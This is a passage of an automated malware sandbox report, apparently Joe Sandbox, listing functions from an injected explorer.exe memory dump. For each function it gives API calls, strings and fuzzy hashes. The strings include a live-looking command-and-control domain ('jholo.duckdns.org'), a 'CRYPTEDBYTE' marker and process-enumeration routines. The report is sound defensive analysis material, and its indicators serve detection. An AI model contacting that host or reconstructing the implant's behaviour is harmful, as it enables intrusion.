                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPathwnsprintf
                          • String ID: %s\%s
                          • API String ID: 161627884-4073750446
                          • Opcode ID: 97f7bb4be75a825a017a6bf767e0d77951ba7becd1f95d9ba2ae187a95026964
                          • Instruction ID: ce026f9075a8c0bccdb7d66972b1ad2803664245da1defe68a753da2186a1645
                          • Opcode Fuzzy Hash: 97f7bb4be75a825a017a6bf767e0d77951ba7becd1f95d9ba2ae187a95026964
                          • Instruction Fuzzy Hash: 0A31EA75128E8582EB58AF14E8843DE7761F7C4B89F500425F79A86A68DF7DC446CB00
                          Function 011A6520 Relevance: 20.1, APIs: 16, Instructions: 141stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • LocalFree.KERNEL32 ref: 011A659C
                          • LocalFree.KERNEL32 ref: 011A65AF
                          • LocalAlloc.KERNEL32 ref: 011A6607
                          • LocalAlloc.KERNEL32 ref: 011A6628
                          • lstrcpyW.KERNEL32 ref: 011A6660
                          • lstrcpyW.KERNEL32 ref: 011A6679
                          • lstrcpyW.KERNEL32 ref: 011A6692
                          • LocalFree.KERNEL32 ref: 011A6750
                          • LocalFree.KERNEL32 ref: 011A675B
                          • LocalFree.KERNEL32 ref: 011A6766
                          • LocalFree.KERNEL32 ref: 011A677A
                          • LocalFree.KERNEL32 ref: 011A6785
                          • VirtualFree.KERNEL32 ref: 011A67C5
                          • LocalFree.KERNEL32 ref: 011A67D0
                          • LocalFree.KERNEL32 ref: 011A67DB
                          • LocalFree.KERNEL32 ref: 011A67E6
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$lstrcpywnsprintf$FolderKnownPathTaskVirtuallstrlen
                          • String ID:
                          • API String ID: 2329222747-0
                          • Opcode ID: b2b08f411e76d6a630806418241aaa0efaa41a980625a12dbe5a1e2a6f1351cf
                          • Instruction ID: e52f5c60e4ae20f7eed17e807abe8187e73bb3da7924f3f3ccf1a6786cb7c088
                          • Opcode Fuzzy Hash: b2b08f411e76d6a630806418241aaa0efaa41a980625a12dbe5a1e2a6f1351cf
                          • Instruction Fuzzy Hash: 2D71E47A228E8482DB18DF55F49439ABB61F7C4B94F544125EB8A83B68DF7CC489CF40
                          Function 01191D90 Relevance: 19.7, APIs: 13, Instructions: 157stringprocessmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 01191DE5
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 01191E0C
                          • Process32FirstW.KERNEL32 ref: 01191E35
                          • CloseHandle.KERNEL32 ref: 01192091
                            • Part of subcall function 011932E0: type_info::_name_internal_method.LIBCMTD ref: 0119332E
                          • lstrcmpiW.KERNEL32 ref: 01191F13
                          • lstrcpyW.KERNEL32 ref: 01191F63
                          • _LDint.LIBCPMTD ref: 01191F75
                          • lstrcpyW.KERNEL32 ref: 01191FB2
                            • Part of subcall function 01192290: construct.LIBCPMTD ref: 01192346
                          • StrCatW.SHLWAPI ref: 01192006
                          • StrCatW.SHLWAPI ref: 01192019
                          • Process32NextW.KERNEL32 ref: 0119207E
                          • LocalFree.KERNEL32 ref: 011920A3
                          • std::rethrow_exception.LIBCMTD ref: 011920C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalProcess32lstrcpy$AllocCloseCreateDintFirstFreeHandleNextSnapshotToolhelp32constructlstrcmpistd::rethrow_exceptiontype_info::_name_internal_method
                          • String ID:
                          • API String ID: 572146554-0
                          • Opcode ID: 20566815292768ddb19e3fe208de43c1b9bb3c51e70477ea2d05641755ccb36c
                          • Instruction ID: 224216776de8c12c743778cba3ee6d451239d4a5a62232e428fcc5f7b73112df
                          • Opcode Fuzzy Hash: 20566815292768ddb19e3fe208de43c1b9bb3c51e70477ea2d05641755ccb36c
                          • Instruction Fuzzy Hash: 8771FD72209A85A2DB38DB14E8943DEB361F7D4798F404226D79D87AA8EF7CC645CB40
                          Function 011BE240 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __free_lconv_mon.LIBCMT ref: 011BE298
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1DF2
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E04
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E16
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E28
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E3A
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E4C
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E5E
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E70
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E82
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1E94
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1EA9
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1EBE
                            • Part of subcall function 011C1DD4: free.LIBCMT ref: 011C1ED3
                          • free.LIBCMT ref: 011BE28C
                            • Part of subcall function 011BC600: RtlFreeHeap.NTDLL(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC616
                            • Part of subcall function 011BC600: _errno.LIBCMT ref: 011BC620
                            • Part of subcall function 011BC600: GetLastError.KERNEL32(?,?,00000000,011BAD80,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011BC628
                          • free.LIBCMT ref: 011BE2AE
                          • __free_lconv_num.LIBCMT ref: 011BE2BA
                          • free.LIBCMT ref: 011BE2C6
                          • free.LIBCMT ref: 011BE2D2
                          • free.LIBCMT ref: 011BE2F6
                          • free.LIBCMT ref: 011BE30A
                          • free.LIBCMT ref: 011BE319
                          • free.LIBCMT ref: 011BE325
                          • free.LIBCMT ref: 011BE352
                          • free.LIBCMT ref: 011BE37A
                          • free.LIBCMT ref: 011BE394
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                          • String ID:
                          • API String ID: 518839503-0
                          • Opcode ID: cc960a244bba1296957b4ba8555efbb7737ec31058a46dae0789a04b08781b71
                          • Instruction ID: 7dc608d96ce2035b2b5e0d43347616bdd6dddd184e6c13cc3635041a4056b052
                          • Opcode Fuzzy Hash: cc960a244bba1296957b4ba8555efbb7737ec31058a46dae0789a04b08781b71
                          • Instruction Fuzzy Hash: F4310632A07A8188EF2EDF69C4E07EC2760EB98B98F085535CB0A5A764CF28D091C351
                          Function 011918F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 115processmemorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
                          • String ID: h
                          • API String ID: 1515568942-2439710439
                          • Opcode ID: 86f9bf02f743d2894e55c04eb65c7a6281638eb6958314ddbfe74eab8205a53b
                          • Instruction ID: 7d1fbac3d5c6dda3523df7dad649055ccfd4f7ee90450cba2606d0ec06be5bee
                          • Opcode Fuzzy Hash: 86f9bf02f743d2894e55c04eb65c7a6281638eb6958314ddbfe74eab8205a53b
                          • Instruction Fuzzy Hash: D6510772218BC586EB749B14F4983DAB3A1F788758F400229DB9947BA9DF7CC084CF04
                          Function 011B7060 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 99stringsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyA.KERNEL32 ref: 011B70E4
                          • WaitForMultipleObjects.KERNEL32 ref: 011B7138
                          • WaitForSingleObject.KERNEL32 ref: 011B714B
                          • lstrcpyA.KERNEL32 ref: 011B71A0
                          • ReleaseMutex.KERNEL32 ref: 011B71BA
                          • ReleaseMutex.KERNEL32 ref: 011B715F
                            • Part of subcall function 011B52E0: lstrlenW.KERNEL32 ref: 011B531D
                            • Part of subcall function 011B52E0: setsockopt.WS2_32 ref: 011B541C
                          • lstrcpyA.KERNEL32 ref: 011B722D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlensetsockopt
                          • String ID: haxwolf$jholo.duckdns.org
                          • API String ID: 864648930-688611332
                          • Opcode ID: fecf3f146bdccc097897548b89d67b5fd197065297feea364247b3118dd6945e
                          • Instruction ID: e46d4d3a7e7d58d231c486c4c9c03d94863ff19648d1739dd4977ac574b05047
                          • Opcode Fuzzy Hash: fecf3f146bdccc097897548b89d67b5fd197065297feea364247b3118dd6945e
                          • Instruction Fuzzy Hash: 9151D435218B8186EB58DF94F8843DAB7A5F784754F40012AEA8E83BA4EF7DD546CB40
                          Function 01199240 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80memoryprocessCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 01199251
                          • GetSystemDirectoryW.KERNEL32 ref: 01199272
                          • LocalFree.KERNEL32 ref: 011993E6
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 011992AC
                          • LocalFree.KERNEL32 ref: 011993DB
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateProcessW.KERNEL32 ref: 01199398
                          • LocalFree.KERNEL32 ref: 011993A8
                          • LocalFree.KERNEL32 ref: 011993B3
                          • LocalFree.KERNEL32 ref: 011993BE
                          • LocalFree.KERNEL32 ref: 011993D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$lstrlen$Alloc$CreateDirectoryFolderKnownPathProcessSystemTask_errno_invalid_parameter_noinfo
                          • String ID: h
                          • API String ID: 2101662253-2439710439
                          • Opcode ID: 81c729fb1548c2497bd964f0e68264aaa04e06b1614a93f71b7eab89c15ca4a2
                          • Instruction ID: 138e177c477f6807f36f359a0050e299873e983373bed3f5e740a69340a1e482
                          • Opcode Fuzzy Hash: 81c729fb1548c2497bd964f0e68264aaa04e06b1614a93f71b7eab89c15ca4a2
                          • Instruction Fuzzy Hash: A2411436218A8582E7249B65F88439EB7A1F7C4754F404129EB8E47BA8CF7DC559CB80
                          Function 011A77B0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • _LDint.LIBCPMTD ref: 011A77FF
                          • RegOpenKeyExW.ADVAPI32 ref: 011A7873
                          • RegQueryValueExW.ADVAPI32 ref: 011A78AF
                          • RegCloseKey.ADVAPI32 ref: 011A78BE
                          • LocalFree.KERNEL32 ref: 011A78C9
                          • LocalFree.KERNEL32 ref: 011A78D4
                          • RegCloseKey.ADVAPI32 ref: 011A78E6
                          • LocalFree.KERNEL32 ref: 011A78F1
                          • LocalFree.KERNEL32 ref: 011A78FC
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          Strings
                          • {A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}, xrefs: 011A7837
                          • SOFTWARE\%s, xrefs: 011A783E
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocClosewnsprintf$DintOpenQueryValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 3338012236-4275378529
                          • Opcode ID: 23279cb71c4bd6c0847ceeffee9e97ff6c10eb49710966fc57f16e99fcffcdd2
                          • Instruction ID: e45a445577a9956b95e7c1a89b50dc89b77e368c6014a75ed7b404d745879f49
                          • Opcode Fuzzy Hash: 23279cb71c4bd6c0847ceeffee9e97ff6c10eb49710966fc57f16e99fcffcdd2
                          • Instruction Fuzzy Hash: 5C314C76228A8482D754DF24F89479AB761FBC4794F801526FB8A83B68DF7DC545CB00
                          Function 011B5CE0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B5CF1
                          • lstrcpyW.KERNEL32 ref: 011B5D35
                            • Part of subcall function 011ADEF0: AllocateAndInitializeSid.ADVAPI32 ref: 011ADF62
                            • Part of subcall function 011ADEF0: CheckTokenMembership.ADVAPI32 ref: 011ADF7F
                            • Part of subcall function 011ADEF0: FreeSid.ADVAPI32 ref: 011ADF96
                          • GetModuleFileNameW.KERNEL32 ref: 011B5D55
                          • LocalFree.KERNEL32 ref: 011B5D64
                          • LocalFree.KERNEL32 ref: 011B5D9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                          • String ID: %s [%d]$CRYPTEDBYTE
                          • API String ID: 2255487582-4036669475
                          • Opcode ID: 235aeaa75262449ed08cf0da43ebc2be91080f72e874cb04567873c9e88faed6
                          • Instruction ID: e0e27280d61e260c6c3b66b2804a41e7dbf6c7a645afc1f51d143e5feccb5549
                          • Opcode Fuzzy Hash: 235aeaa75262449ed08cf0da43ebc2be91080f72e874cb04567873c9e88faed6
                          • Instruction Fuzzy Hash: 29311C71218A8586DB989F55E8883DE67A1F7C8788F400125E78F87B74DF7DC085CB40
                          Function 011994B0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 56memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994C7
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011994F1
                          • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199522
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199535
                          • CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 011995AA
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 0119958D
                          • CoTaskMemFree.COMBASE(?,?,?,?,?,?,?,?,?,?,01199412), ref: 01199598
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,01199412), ref: 011995B5
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,01199412), ref: 011995C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$AllocTask$FolderKnownPath_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 2950865958-2868705786
                          • Opcode ID: e87af4adcf4b971b7a9ea5863792aeab0100afc9c8f44779608da6c5abcd29c6
                          • Instruction ID: 782d7f92d192667c0bff4b9f7b263fccac920eef538cc1d8da70b46b4f71f3e2
                          • Opcode Fuzzy Hash: e87af4adcf4b971b7a9ea5863792aeab0100afc9c8f44779608da6c5abcd29c6
                          • Instruction Fuzzy Hash: 5821DB72124A8582E7289F15E8947EA7761F7C8B5CF54012AFB8E47B68DF3CC545CB40
                          Function 011C0494 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 482796045-0
                          • Opcode ID: b4b3d6fc9dc7e4860d266c267018562cdbfaf00e8137f1052f831943caba0ce4
                          • Instruction ID: 6f15b0419c31f528d0da3ead016592757c28bbf1808ba697c526ee964b71db9e
                          • Opcode Fuzzy Hash: b4b3d6fc9dc7e4860d266c267018562cdbfaf00e8137f1052f831943caba0ce4
                          • Instruction Fuzzy Hash: 1F51062A214A91C5DB2C9F3999902BD6720FBB9FA8F144319FB7A4B7D0DF28C4528301
                          Function 011B98B4 Relevance: 18.1, APIs: 12, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
